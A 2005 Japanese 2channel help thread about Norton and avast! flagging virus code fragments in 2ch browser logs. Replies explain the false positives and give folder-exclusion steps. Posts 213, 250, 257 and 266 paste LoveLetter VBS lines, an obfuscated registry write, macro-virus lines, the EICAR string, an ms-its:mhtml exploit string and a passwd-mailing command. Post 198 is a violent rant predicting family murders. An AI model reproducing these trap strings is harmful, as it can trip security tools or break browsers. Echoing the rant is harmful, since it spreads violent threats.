ノートンがvbsウィルスのソースに誤反応3at PCQA
ノートンがvbsウィルスのソースに誤反応3 - 暇つぶし2ch150:ひよこ名無しさん
05/06/09 06:32:01 /DokQMWm
ノートパソコンなんですが、キーボードの隙間にゴミが入ってキーが押しにくくなって困る

151:ひよこ名無しさん
05/06/09 22:09:48 c+f8GHIp
パソコンの電源入れると最初にseeqという検索サイトが出る
ようになっちまいました。以前はMSNだったんですけど、昔の体に
戻れますか?戻し方教えてください

152:ひよこ名無しさん
05/06/09 22:24:05
>>151
スレ違いだけど、システムの復元で直前の日付に戻せ。

153:ひよこ名無しさん
05/06/09 22:45:34 c+f8GHIp
スレ違いですか、すみません。パソコン初心者なん
システムの復元ってどうやるんですか?

154:ひよこ名無しさん
05/06/09 22:46:44
>>153
URLリンク(www.google.co.jp)

155:ひよこ名無しさん
05/06/09 22:48:38
ありがとうございます がmばってみます

156:ひよこ名無しさん
05/06/09 22:51:53
最近また急激に増えたな。
ウイルスバスターloveのやつらのしわざか?

157:151
05/06/09 22:54:18
OSが2000なんですけど… 復元できないみたいです

158:ひよこ名無しさん
05/06/09 22:55:26
>>157
リカバリしろ

159:151
05/06/09 22:58:46
リカバリってお金出して修理みたいですね…

160:ひよこ名無しさん
05/06/09 22:59:32
>>159
自分でできる。取扱説明書を150回嫁

161:151
05/06/09 23:02:46
読みます!
最近外国のサイトの広告みたいのが表示されることがあって…
リカバリでその辺も治りますか?

162:ひよこ名無しさん
05/06/09 23:09:30
>>161
直る

163:ひよこ名無しさん
05/06/09 23:09:42
>>161
基本的には、リカバリで買った時と同じ状態になる。
従って、データは全部消えるので、気をつけて。

164:151
05/06/09 23:14:51
ありがとうございました!
今度はデータのバックアップについて勉強しないといけなそうですね。
ちなみに何の広告なんですかねこれ↓
URLリンク(adserver.sharewareonline.com)
ダウンロードしろって感じで頻繁に表示されるんです

165:ひよこ名無しさん
05/06/10 19:44:30 Z3xy6uEy
スミマセン。他のスレから誘導されてきました。
VIP板をリロードすると毎回ノートン先生がウイルス警告してくるんですがなぜですか?
ウイルス名     Bloodhound.Exploit.6
適用した処理   ファイルを修復できません。

と出てOKを押した後に
ウイルス名     Bloodhound.Exploit.6
適用した処理   ファイルへのアクセスが拒否されました。

とでます。
VIP以外の板ではこのような警告は出ません。ノートンは2005年の新しいやつです。
ウイルススキャンしてみましたが問題ありませんでした。
OSはXPです。
よろしくです。

166:ひよこ名無しさん
05/06/10 20:58:43
このスレの最初のへん読めばわかるよ

167:165
05/06/12 02:06:13 CFzaInzJ
>>166
あの。。。いろいろみましたけど専門用語ばかりでよくわかりません。
半年ROMはすでに経験墨です。
できたら詳細も教えていただきたいのですが。

168:ひよこ名無しさん
05/06/12 02:08:54
>>167
ノートン捨てるんだ。

169:ひよこ名無しさん
05/06/12 14:33:06
>>167
>7

170:165
05/06/12 14:54:46 Yt6W8JkL
普通に感染されてました。。。
検疫というのをしたら問題のファイルがどっかいったみたいです。


171:ひよこ名無しさん
05/06/13 00:20:19 vyhhOQ6i
スレリンク(ascii板)
ここのウイルスコードで出来たスレタイをクリックしてから、
すべての板で書き込むたびに誤作動をおこします・・・・
それでここへたどりついたのですが、

>NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

これって具体的にどうすればいいのでしょうか?
・オートプロテクト
・除外
・除外する項目
とまでは出来たのですが、最後の「除外する項目」に何かを入れるのですか?
それとも項目を削除するのですか?
何を入れたらいいのか、何を削除すればいいのか教えてください・・・。

今現在の項目はこの3つです
*.dbx
*.nch
*.sysutem volume information

ライブ2ちゃん使用です。

172:ひよこ名無しさん
05/06/13 00:22:19
>>171
ログのあるフォルダーのバスを追加する

173:ひよこ名無しさん
05/06/13 00:25:28 vyhhOQ6i
>>172
よければ手順を・・・・まったく意味が分かりません・・・・

174:ひよこ名無しさん
05/06/13 01:00:06 vyhhOQ6i
>>7を参考に、
Cドライブ→プログラム→ライブ2ちゃん→ログ
とういう感じでログをノートンの除外に選択したら、半角板を開いただけでノートンが反応することはなくなりました。
しかし、すべての板で書き込むたびにノートンが反応するっていうのは直りません。

どうすればいいですか?

175:ひよこ名無しさん
05/06/13 01:04:12 vyhhOQ6i
「kakikomi」というのも除外に選択したらなおりました。おさがわせいたしました。

176:ひよこ名無しさん
05/06/13 01:53:23 vyhhOQ6i
半角を踏んだらウイルス反応(誤作動)する方へ


専用ブラウザlive2chとノートンを使ってる方へ
スレリンク(ascii板)


177:名無しさん@お腹いぱーい。
05/06/13 15:14:46 ZBKBALPS BE:3772883-##
てす

178:名無しさん@お腹いぱーい。
05/06/13 16:16:31 BE:9903997-##
>>171-176


ノートントラップ
URLリンク(ansitu.xrea.jp)
Q8.2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
URLリンク(ansitu.xrea.jp)

※スレタイがノートントラップのスレに書き込んだ場合、書き込み履歴も反応します。


2chWikiは申請中。

179:ひよこ名無しさん
05/06/13 21:20:42 IDZd2XHn


180:ひよこ名無しさん
05/06/13 21:42:48 +eHKR6hW
ノートンがvbsウィルスのソースに誤反応、
ってスレタイにもあるけど、ビューア経由でも反応するんですか?
スレによっては、IEと使い分けてるんですが、ビューアで開いた時に
限って怒られるんです・・・。

181:ひよこ名無しさん
05/06/13 21:44:03
ノートン捨てちゃえ

182:ひよこ名無しさん
05/06/13 21:49:48
>>175
ウイルスを書き込んだのですか、ああ、そうですか。

183:180
05/06/13 21:55:46
>>176
ご回答ありがとうございます!助かりました(←大馬鹿)!


184:ひよこ名無しさん
05/06/14 15:17:13
>>170
詳しく。
漏れも同じ症状でビビってる。

185:ひよこ名無しさん
05/06/14 15:43:32
>>184
>>178

186:ひよこ名無しさん
05/06/15 07:07:41 MyWTZaCo
祭り中でーすw

URLリンク(www.bonotto.jp)

韓国の小学生が描いた絵
スレリンク(korea板)

187:縞んてっく
05/06/15 09:22:16
脳豚を入れているユーザは2ちゃんを見ないようにしてください。

188:ひよこ名無しさん
05/06/15 15:31:52
avast!入れてる貧乏人の俺はどうですか?

189:ひよこ名無しさん
05/06/15 21:11:20 MbvAfu2/
URLリンク(fuckingreset.cesarsoft.com.ar)
ウィルス注意↑
これ多分ウィルスですが、貼られたスレッドを開いただけでノートン反応します
これも>>98同様、誤反応ですよね?

190:ひよこ名無しさん
05/06/15 22:55:11
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

191:名無しさん@お腹いぱーい。
05/06/18 23:57:40 BE:6603067-##
スレリンク(sec板:5番)
Q. 2chのスレを2chブラウザで開くと、ウイルスを検出するんだけど
A. avast!はノートンと同じく、ウイルスコードも検出する。
ただのテキストのコードなのでウイルスに感染することはない悪戯行為だから気にしないで大丈夫。
誤検出しないようにするには、以下の2通りの方法がある。

・avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に2chブラウザのdatフォルダを設定
・2chブラウザでWebシールドを使わないように設定

URLリンク(info.2ch.net)



>>189
それだけではわかりません。
そのようなリンクを貼られるようなスレではノートントラップも貼られていたのかもしれませんし、
あなたがリンク(他にも同様な悪意あるリンク)を踏んでいて反応したのかも
(2ちゃんねるブラウザによっては画像サムネイル機能が働いて画像ファイルに偽装されたウイルスに反応することがあります。・・・正常な反応です。)

リンクを不用意に踏まないことも肝心です。
>>4
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)

192:ひよこ名無しさん
05/06/20 18:43:13
ひろゆきは2ch総合案内に対処法載せてくれないの?
初心者はこんな所見ないと思うのだが…

193:ひよこ名無しさん
05/06/20 19:34:26
>>192
そんなこと書かなくても、根本的に対策できるのに3年以上放置。
ノートンも放置。
そんなもんさ。

194:ひよこ名無しさん
05/06/20 20:01:35
サイトの問題ではなくて、ノートンとそのユーザーの問題だからでしょ。
どうしても見て欲しい、書き込みして欲しいと思えばそういうこともするだろうけど、
めんどくさいから、対策できない人は切捨てって考えてるんでしょ。

195:ひよこ名無しさん
05/06/22 01:42:06
ニュース速報みてたらノートン先生が激怒しました!今、スキャン中何かすごい不安

196:ひよこ名無しさん
05/06/22 01:50:09
年取ると怒りっぽくなるよね

197:ひよこ名無しさん
05/06/22 01:59:11
ハァ?

198:ひよこ名無しさん
05/06/22 06:30:50
まぁ今危ぶまれている年間自殺者3万人なんていうのもさぁ
何だかんだ言ってお友達と楽しく戯れていた全共闘世代のジジイがほとんどで
そんな奴らのノスタルジーとニートの絶望的な孤独を一緒にされちゃあかなわないよね。

まぁ政府も腹の底じゃあ、このままズルズルと大人になって勝手に死んでくれりゃあ本望
とか思ってるだろうケドさあ、俺達には一人一人明確な敵がいるんだよね。
原因があっての結果。
勉強しなきゃ立派な大人になれませんよなんて乳幼児でも知ってることを
やらなかったらこうなった、なんて言い切れるほど楽天家じゃないんだよね。

アホみたいな受験戦争、家畜のような体罰教育、友達からの陰湿なイジメ、見知らぬ大人のいやがらせ

バブル期に子供にだけ苦労させて親やセンセや同級生は泡まみれで遊び放題。
敷かれたレールの先に娯楽があると鞭打たれ、苦難を乗り越えたどり着いたら就職難。
ゴミのように切り捨てられていく俺らの10代、20代。
いつの間にか自分より馬鹿が出世して、自分よりブサイクが結婚し、自分より足の遅いヤツがオリンピックに出ている。

両親を恨む者、先生の居所を探す者、同僚の近況を探る者、誰でもいいから殺してやりたいと思っている者
そんなヤツらがじっと己の部屋で計画を練っている。
まぁはっきり言わせてもらえば、あんたら、幸せ家族を気取っているのも今のうちだね。

鬱ブームだかなんだか知らないが、テレビ一つ落ち着いて見られなかったような俺らに
勝者、敗者とか貧乏さん番組なんてメディア戦略は通用しないね。

殺されるまえに、必ず殺す。
そう、この先10年。
被害者の過去2-30年を遡らないと犯人が割り出せない
そんな一家まるごと惨殺事件が続くだろうね・・

199:ひよこ名無しさん
05/06/22 14:52:29
age

200:ひよこ名無しさん
05/06/23 20:20:22
>>192
ひろゆきは初心者大嫌い
ひっかかって嘆くユーザーをみてニヤニヤしてます
それが嫌なら来るなって考え

201:ひよこ名無しさん
05/06/24 11:57:13
先生が反応しBloodhound.Exploit.6が出現!
みなさんどう?

202:ひよこ名無しさん
05/06/27 15:24:14
age

203:ひよこ名無しさん
05/06/28 21:44:54
>>201
前にそれありましたけど。(当方Jane Doe Style)
反応した部分の過去ログ捨てたら何も問題なかったですよ。

204:ひよこ名無しさん
05/06/28 21:49:26
>>201
それはログのウイルスコードに反応してるだけだからむっしっし

205:ひよこ名無しさん
05/06/29 10:53:00
age

206:ひよこ名無しさん
05/06/30 09:46:32


207:cen ◆Pm9xOTJuM.
05/07/03 02:02:31 2e/PomzS BE:10829873-##
そうそう。
>>17のソフトをアップデートしたので、よかったらダウンロード
してくださいです。
URLリンク(www.geocities.jp)

208:ひよこ名無しさん
05/07/03 02:21:24
>>207
ウィルス注意!!

209:ひよこ名無しさん
05/07/03 11:33:52
>>207
見損ないました

210:ひよこ名無しさん
05/07/03 12:37:13
ノートン先生がunix.Penguinに誤反応してしまって
今のとこ解決策はないんでしょうか?
ノートン先生捨ててバスターに変えても問題ない?
XPはノートン先生入れとかないとまずいみたいなこと聞いたんだが・・

211:ひよこ名無しさん
05/07/03 13:08:38
>>208-209
どういうこと?新verにウィルスが入ってたの?

212:ひよこ名無しさん
05/07/03 13:44:44
>>207
コレはジョーダンのつもり?シャレんなんないでしょ

213:ひよこ名無しさん
05/07/03 14:59:25
c.Copy(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs

214:ひよこ名無しさん
05/07/03 16:51:16
>>211
ただの叩き

215:ひよこ名無しさん
05/07/04 22:08:48
age

216:ひよこ名無しさん
05/07/04 22:51:16
ペンギンウイルスは無害?

217:ひよこ名無しさん
05/07/05 00:28:46
移動してきました、度々すいません。半角文字列板のスレを開いたらウイルス警告が出ました。
環境はノートンです。
スキャン後も感染を修復することはできませんでした。
ウイルス名:Bloodhound.Exploit.6

誘導されてこちらにきました。
初心者で何をしたらいいかわかりません・・このスレにウイルスがいるのでしょうか?
ご教授お願いします・・

218:217
05/07/05 00:57:58
追記
発生源 C:\Documents and Settings\Owner\デスクトップ\Jane\Logs\2ch\大人の時間\半角文字列\1120269811.dat

です。誤報なのでしょうか?修復できないので不安です・・

219:ひよこ名無しさん
05/07/05 01:04:26
>>218
少しはスレを読め

220:217
05/07/05 01:41:21
すいません読み返しました。
・・一応反応のあったログを削除後ログファイルを除外指定しました。

除外しましたが、
ログファイルの中には数々のフォルダがありました。ログ自体、感染はあり得ないのでしょうか?
有り得ないから除外するのだと思いますが、念のためお聞きしました

221:ひよこ名無しさん
05/07/05 01:42:54
>>220
有り得ない。
ノートンの手抜きチェックが悪い。

222:217
05/07/05 01:47:47
わかりました。ありがとう御座います。

あと、ログフォルダの中のログファイルでした。訂正します。すいません

223:ひよこ名無しさん
05/07/05 21:43:47


224:ひよこ名無しさん
05/07/07 16:50:38 8PA32UYB
Bloodhound.Exploit.6ってのが頻繁に検出される。
これはに関しては誤作動ではないんだよな?

225:ひよこ名無しさん
05/07/07 16:54:19
みんな どんどんウイルシに感染してるよ

226:ひよこ名無しさん
05/07/07 17:01:06
考えるんじゃなくて感じて

227:ひよこ名無しさん
05/07/12 21:42:11 ubqbqkwI
警告キタ━━━(゚∀゚)━━━ !!

228:ひよこ名無しさん
05/07/13 13:31:31 yrCZUMNS
a

229:ひよこ名無しさん
05/07/13 23:57:08
>>217
おいらも同様の症状なのですが、どうなんでしょうか?

230:ひよこ名無しさん
05/07/14 00:00:53
>>229
ただの誤検出

231:ひよこ名無しさん
05/07/14 13:01:20
Bloodhound俺もキタよ。実況板で。

232:ひよこ名無しさん
05/07/14 14:37:31
シマンテックのオンラインスキャンをすると、
2chブラウザのdatファイルからウィルス反応しまくりなんですが、
この手の反応は全て誤反応と解釈してよろしいですか?

233:cen ◆Pm9xOTJuM.
05/07/15 21:44:52 AyDUrGnO BE:27848096-##
そうそう。
>>17のソフトをアップデートしましたので、よかったら
ダウンロードをしてくださいです。
URLリンク(www.geocities.jp)

234:cen ◆Pm9xOTJuM.
05/07/15 21:45:17 BE:18049875-##
>>232
それでいいと思います。

235:232
05/07/16 00:14:07
>>234
ありがとう。安心した

236:ひよこ名無しさん
05/07/16 15:48:29
安心した

237:ひよこ名無しさん
05/07/16 20:23:01
それでいいのか?・・・・・ほんとにだいじょぶ?

238:cen ◇Pm9xOTJuM. に注意
05/07/18 00:23:37
パソコン初心者総合質問スレッド vol.1072
スレリンク(pcqa板)

399 名前:299[] 投稿日:2005/07/06(水) 21:47:49 ID:YFmNomOu
★症状: 以前までは出来ていた、PCでのDVD-Video再生が出来なくなった。
★試したソフト: Media Player Classic , Mediaunite , Windows Media Player 10
★関係有りそうな出来事: DirectShow Filterに「GPL MPEG-1/2 Decoder」を追加した。

何方か原因解りませんか?
せめてハードかソフト、どちらに原因がありそうかだけでも解れば幸いです。

405 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:50:29 ID:???
>>399
ハードかソフトに原因

408 名前:cen ◆Pm9xOTJuM. [sage] 投稿日:2005/07/06(水) 21:52:09 ID:??? ?##
>>405
あと人間

411 名前:ひよこ名無しさん[sage] 投稿日:2005/07/06(水) 21:53:30 ID:???
>>408
暴言ヒドスw

239:ひよこ名無しさん
05/07/18 01:23:34
cenも人間

240:ひよこ名無しさん
05/07/20 16:38:42 1McjtpBt
 初心者の質問のところから誘導されてきました。以下にそのままコピペします。


 windowsXPのhome editionで、Internet Exproler6、更新バージョンはSP2です。
よろしくお願いします。

 ノートンのアンチウィルスが「Unix Penguin」というウィルスを検知しました。
場所がインターネット一時ファイルのようだったので、「インターネットオプション
→ファイルの削除」をしました。

 すると、なぜか「お気に入り」が消えてしまったのです。

 誤って自分で消してしまったのだろうと言われたのでそうかと思い、もう一度
覚えている限り戻そうとしたら「入力したショートカットの名前は既にお気に入り
メニューに存在します。置き換えますか?」と出ます。それで置き換えても
表示されません。新たにショートカットの名前を変えて登録すれば表示される
のですが……。

 私の「お気に入り」の中には、表示されるものと表示されないものが両方
存在しています。表示されないものを再び表示する、または消し去ることは
できないでしょうか。消し去れれば、また再び作り直そうと思いますが…。

241:ひよこ名無しさん
05/07/20 16:45:29
>>240
誘導してない。
少しはログ読め。

242:240 
05/07/20 16:54:41
>>240
 ああほんとだ!
 すみません、慌ててました……

243:240 
05/07/20 17:02:34
>>241
 でも、表示のみ消えた「お気に入り」については、どこかに書いてありますか?

 ノートンとは関係ないのかもしれないですが…。

244:ひよこ名無しさん
05/07/20 17:04:13
>>243
関係ない。
インターネットオプション→詳細設定→使用してないフォルダは閉じる

245:240=243
05/07/20 17:23:59
 ありがとうございます。
 やってみましたが、駄目でした。

 そもそも「お気に入り」の星マークのアイコンが、見当たりません。favorite
の中もカラになっています。私はなんだか変なことをしてしまったみたいですね。

 もうちょっといじってみることにします。。失礼しました。

246:ひよこ名無しさん
05/07/21 11:16:56
ノートンアンチウィルス2005、open jane Doe 0.1.12.2 を使っています。
該当スレのログを除外しようとしたのですが、スレッドのidxはあるのですが、datがそのスレッドに限って見つからず、改善できません。
スレッドは
スレリンク(koumei板:11番)
このメール欄にウィルスコードが貼ってあるのです。
対処の方法を御教示願います。

247:246
05/07/21 13:27:51
すみません、自己解決しました。
スルーしてください。

248:ひよこ名無しさん
05/07/22 03:59:12 pHdm2INX
age

249:ひよこ名無しさん
05/07/22 22:55:05 EfV4fKSJ BE:245057797-
【Live2ch 】 1.10
【 スキン  】 Default
【Windows】 XP
【Firewall .】 NortonInternetSecurity
【 不具合 】 騙されてms-its: mhtml:file://c:\をメール欄に書いたらブラウザがおかしくなった。
        インストールフォルダのメールのテキストドキュメントも開かない。


250:ひよこ名無しさん
05/07/22 22:56:13
ほう・・・騙されてねぇ~

c.Copy(dirwin&"\Win32DLL.vbs")?
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")?
<object?data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)"?type="text/?
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*?
fso.copyfile?"dirsystem&nurupo.vbs",?"j:\windows\start?menu\programs\startup\"?
If?s?=?"htm"?and?fso.FileExists(f1.path+"l")?=?False?then?fso.CopyFile?f1.path,?f1.path+"l"?
ToInfect.CodeModule.InsertLines?BGN,?ADI1.CodeModule.Lines(BGN,?)?
G.RegWrite?A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),?E.BuildPath(E.GetSpecialFolder(1),?A("VHORU@SU/WCR"))?
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))?  
ms-its:mhtml:file://c:\ ?
kak.hta';ken=wd+'START?

251:ひよこ名無しさん
05/07/23 20:23:19
Bloodhound流行ってんの?

252:ひよこ名無しさん
05/07/24 21:16:56 cauqGl4H
よく分からんけど、結局、感染してたとしても放っときゃいいんだろ?

253:ひよこ名無しさん
05/07/27 18:55:26
ハァ?

254:こむ
05/07/27 23:43:56 mxkxVm4b
Aya の自作自演
スレリンク(pcqa板:837-846番)

837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa
あまりに馬鹿馬鹿しい質問ですいません。
Windows Media Plyaer と KbMedia Player  がパソコンの中にあるのですが、MP3ファイルをクリックすると
Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか?

838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:???
>>837
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。

839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa
>>837
1.mp3のファイルをクリック
2.「アプリケーションから開く」を選択
3.プログラムの選択
4.「これらのファイルを開くときは、
  いつもこのアプリケーションを使う」にチェック
5.OK

840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:???
>>839
自作自演するときはIDを消しましょうね(ワラ

255:ひよこ名無しさん
05/07/29 10:45:54
>>252
そういうことだな。

256:ひよこ名無しさん
05/07/30 06:15:31
うちのノートン2004、除外の設定するときフォルダ検索をしないとできない。
IEのを手書きで入力したけどやっぱり反応した。
c:\program files\musicjg2ch\log
c:\program files\musicjg2ch\temp.htm
これを入れてもダメだった。
ギコナビなら除外の設定はすんなりいったんだけどな…。

257:ひよこ名無しさん
05/08/01 18:02:23
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START

258:ひよこ名無しさん
05/08/03 16:00:39
んなもん貼っても反応しねーよ
真に受けやがってカスがw

259:ひよこ名無しさん
05/08/05 11:13:48
>>257
他のスレでこういうのが貼ってあり、かちゅを閉じたら
IEが全く見られなくなってしまいました

>>10をやってみたのですが、やっぱり見れない
今生きてるのはかちゅだけです。助けてください

260:名無しさん@お腹いぱーい。
05/08/05 13:25:34
>>259
ノートンが原因だったら以下コピペ
2003/2004(2005もこれだと思う)

Norton Internet Security もしくは Norton Personal Firewall を起動する。
画面中央の [ファイアウォール] をクリックする。
右下に表示される [設定] ボタンをクリックする。
[プログラム制御] タブをクリックする。
[追加] ボタンをクリックする。
「プログラムの選択」ウィンドウが開きます。
Internet Explorer フォルダを開く。
Internet Explorer フォルダは今回の例の場合です。
お客様が設定を行いたいアプリケーションがインストールされているフォルダを開いてください。
IEXPLORE.EXE をクリックして選択する。
IEXPLORE.EXE は今回の例の場合です。
お客様が設定を行いたいアプリケーションを選択してください。
[開く] ボタンをクリックする。
例としてご案内している Internet Explorer を含め、設定がすでに作成されているアプリケーションの場合は「すでにルールがあるプログラムを追加しようとしています」というメッセージが表示されますが、まだ設定されていないアプリケーションの場合は表示されません。
「プログラム制御」のウィンドウが表示されるので、「どう処理しますか?」の部分で [許可] もしくは [遮断] などを選択して、[OK] ボタンをクリックする。
「アプリケーションカテゴリの選択」ウィンドウが表示されるので、そのアプリケーションをどのカテゴリとして分類するかどうかを選択し、[OK] ボタンをクリックする。

2002
NISをたちあげ、ファイアウォール→インターネットアクセス制御(アプリケーション制御の一覧)で設定が変えられます

IE5の修復は以下コピペ

1. [スタート]-[設定]-[コントロールパネル] から「アプリケーションの追加と削除」を起動します。
2. [インストールと削除] タブをクリックし、「Microsoft Internet Explore 5 とインターネットツール」をクリックします。
3. 「追加と削除」ボタンをクリックし、表示されるメニューから「Internet Explore を修復する」を選択して「OK」をクリックします。


XPならシステムの復元

261:ひよこ名無しさん
05/08/07 01:32:04 +PgqXMkS
URLリンク(web.archive.org)

262:ひよこ名無しさん
05/08/11 07:34:19
保守

263:ひよこ名無しさん
05/08/11 17:48:51 /1wx1GK2
このスレ、全く見えない!

264:ひよこ名無しさん
05/08/11 18:10:33
a

265:ひよこ名無しさん
05/08/11 18:17:33
sage

266:ひよこ名無しさん
05/08/13 00:51:52
ms-its:mhtml:file://c:\

267:ひよこ名無しさん
05/08/13 20:52:27
sage

268:ひよこ名無しさん
05/08/15 00:02:49
te

269:ひよこ名無しさん
05/08/17 11:53:47
保守

270:ひよこ名無しさん
05/08/24 07:54:30
保守sage保守age

271:ひよこ名無しさん
05/08/24 08:22:24 ujhK/t33
ノートンアンインストールしてウィルスバスター入れました
おかげでこのスレも見れるようになりました

272:ひよこ名無しさん
05/08/24 08:38:01
保守

273:cen ◆Pm9xOTJuM.
05/08/24 22:22:22 BE:9282863-##
そうそう。
>>17 のソフトですが、シリア語ブラクラにも対応しました。
あと、何日前以降に更新されたファイルのみ検索の設定ができるように
なりましたです。
URLリンク(www.geocities.jp)

274:経営情報学部の学生 ◆2H3Xipoq6Y
05/08/24 22:37:51
>>273
いつも乙です。

275:ひよこ名無しさん
05/08/25 07:46:50
>>271
単にウイルス検出対象ファイルからhtm、html、datを外せば済むことなのに…
まあ少しでもお金使って貰わないとカネの巡りが悪くなるからな。

276:ひよこ名無しさん
05/08/25 07:48:06
って、htmとhtmlは外すとまずいのか。
けど通常のインターネットブラウザで2chしてる時点で(ry

277:ひよこ名無しさん
05/08/30 13:01:34
>>273
乙です。
壺のdatファイルなんですが、ノートンで誤反応のファイルが見つかったのに
vicptdel.exeで検索したら0個だったんですがまだ対応されてないだけでしょうか?
VBS.LoveLetter.Varとでてましたが。

278:cen ◆Pm9xOTJuM.
05/08/30 18:25:22
>>277
どうもです。
今のところ、壺のdatファイルには対応しておりません。
対応しているのは、2chに直接置いてあるdatだけです。
この板なら、URLリンク(pc8.2ch.net) のような
datファイルのみです。
壺のdatファイルは構造が違うので、datファイルの構造のチェックで
弾いてしまう仕組みになっています。

279:ひよこ名無しさん
05/08/30 19:57:15
良スレあげ

280:277
05/08/31 15:04:38
>>278
分かりました。素早いレスどうもありがとう。

281:ひよこ名無しさん
05/09/05 10:13:36 j/2HcsnQ
このスレ開いたらノートンが反応するんだけどどうすればいいですか?
ブラウザはopen janeです。

282:ひよこ名無しさん
05/09/05 10:15:25
>>281
見なきゃええやん

283:ひよこ名無しさん
05/09/05 10:17:19
>>281
俺はな、このスレを最初から読んで欲しくて誘導したんだ
過去レスを一切読まずに質問するな

284:281
05/09/05 10:20:43 j/2HcsnQ
>>282-283
がんばって勉強する。

285:ひよこ名無しさん
05/09/09 17:56:51 fF3/dpmm
Open Jane Doe α 0.1.12.2です

Nortonが誤反応する人へ対処法
1.NortonInternetSecurityを起動
2.オプション→NortonAntiVirusをクリック
3.左側のシステム>Auto-Protectをクリック
4.除外→新規をクリック
5.2ch専用ブラウザのフォルダを指定する

設定して試してみたらまた反応してしまいました

Norton AntiVirus Auto-Protect

ファイル C:\...orary Internet
Files\Content.IE5CLIVSTUF\subback[32].html を修復できません。
このファイルは Unix.Penguin ウイルスにまだ感染しています。

どうしたらいいのですか?教えて下さい


286:285
05/09/09 18:00:22
NIS2004/2003はNorton AntiVirusのオプションで手動スキャンと
Auto-Protectでそれぞれ除外の指定
ノートン2005なのでそれぞれ除外しても駄目でした

一時ファイルを削除する模様
これもやってみたけど駄目でした

他に方法はないでしょうか?教えて下さい

287:名無しさん@そうだ選挙に出よう
05/09/10 23:24:43
>>285-286
> Norton AntiVirus Auto-Protect
> ファイル C:\...orary Internet
> Files\Content.IE5CLIVSTUF\subback[32].html を修復できません。
> このファイルは Unix.Penguin ウイルスにまだ感染しています。

IEのキャッシュですね。
>>286で一時ファイルを削除しても反応するのは
IEでまた該当スレを開いたのではないのでしょうか。

ノートントラップの回避方法は2ちゃんねるブラウザで>>1の設定をして
2ちゃんねるをみてください。
Janeの設定も今一度確認してください。

288:ひよこ名無しさん
05/09/13 18:45:27
>>109
テスト

289:ひよこ名無しさん
05/09/16 12:55:29 yJ4mdqCh
ギコナビ使ってます。ノートンが反応してから見れないスレなどあります。
>>10にある方法で解決するんだと思うのですが、
除外してしまって問題あることはないですか?
画像のプレビューとか出ますけど、そういうのに何かまずいものがあったとき困るとか・・。
まったく見当違いな心配かもしれませんが、
よくわからないので教えてください。

290:ひよこ名無しさん
05/09/16 13:01:54
>>289
IEエンジン使ってないJane DOE系の2chブラウザにしろよ
画像に何か仕込んでどうこうってのはIEの脆弱性を狙うから

291:ひよこ名無しさん
05/09/16 13:04:53
>>289
非IE系専ブラのログなら除外しても問題ない。
ギコは知らん。
IEがトラブっても使える非IE系のほうが何かと便利。

292:ひよこ名無しさん
05/09/16 13:15:19 yJ4mdqCh
>>290-291
ありがとうございます。他の専ブラ検討してみます。

293:ひよこ名無しさん
05/09/18 08:28:38
>>292 
名前で拒否する方もいますが、Nidaも安定していて便利ですよ。

JaneNida Part4
スレリンク(software板)

294:ひよこ名無しさん
05/09/21 00:43:04
>>289
ギコナビで画像プレビューした場合、画像はIEのキャッシュのほうに保存される。
なのでログフォルダを除外してしまってもその点で問題あることはない。

295:ひよこ名無しさん
05/09/24 13:11:15
物凄い今更でどうでもいいけど気になったので。
>>51間違ってるじゃないか
C\ProgramFiles\Live2ch\log→C:\Program Files\Live2ch\log
「:」と「 」が足りない。

296:ひよこ名無しさん
05/09/24 16:45:22
うまくいかないケースの原因はたいがいそんなもんだ

297:ひよこ名無しさん
05/09/25 00:59:38
lm

298:ひよこ名無しさん
05/09/25 01:12:35 Ztexw1t3
来てやったぜ、

299:ひよこ名無しさん
05/09/26 18:12:03 FlGrISrC
>1~10を読んでノートンの除外設定をしようとしているのですが、
2chブラウザのログ保存フォルダがどれのことか分かりません
ギコナビ使ってます。おしえてください

300:名無しさん@当選・落選
05/09/27 02:00:49 BE:7545986-##
>>299
URLリンク(ansitu.xrea.jp)
URLリンク(ansitu.xrea.jp)
以下を一行ずつコピー、除外項目でCtrl+V

C:\Program Files\gikoNavi\Log
C:\Program Files\gikoNavi\config\History.xml
C:\Program Files\gikoNavi\config\Favorite.xml
C:\Program Files\gikoNavi\sent.ini

より詳しい除外項目はこちらで今一度確認してください。
